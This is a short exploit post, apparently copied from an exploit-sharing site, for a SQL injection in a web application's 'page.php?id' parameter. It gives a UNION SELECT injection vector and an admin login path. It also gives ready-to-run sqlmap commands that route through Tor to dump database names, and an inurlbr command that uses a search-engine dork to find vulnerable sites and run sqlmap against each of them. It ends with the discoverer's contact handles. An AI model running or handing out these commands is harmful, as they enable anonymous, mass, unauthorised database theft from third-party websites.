    Vector:  UNION ALL SELECT NULL,NULL,NULL,[QUERY],NULL-- 

[+] Login Page: 
http://www.test.com/admin

[+] EXPLORING WITH SQLMAP:
sqlmap.py -u 'http://www.target.com/page.php?id=1' -p id --random-agent --beep --level 3 --risk 2--threads 2 --tor --check-tor --tor-type=SOCKS5 --dbs --dbms='Mysql' --time-sec 10 --batch

OUTPUT PRINT:

[+] EXPLORING WITH MASS INURLBR:
php inurlbr.php --dork 'intext:"Aadi" & inurl:"page.php?id="' -s aadi.txt  -q 1,6 --exploit-get "?&id=1%270x27" --command-vul "sqlmap.py -u '_TARGETFULL_' -p id --random-agent --beep --level 3 --risk 2 --threads 2 --tor --check-tor --tor-type=SOCKS5 --dbs --dbms='Mysql' --time-sec 10 --batch"

OUTPUT PRINT:

[+] Discoverer Author: Killer~X
[+] EMAIL:             M_ox@hotmail.com
[+] FACEBOOK:          http://www.fb.com/xXalreshyXx
[+] ASK:               http://www.ask.fm/ALRESHY

Source:
http://www.exploit4arab.net/exploits/1486

Read more

by Malik korrich ~ dimanche 10 mai 2015 0 commentaires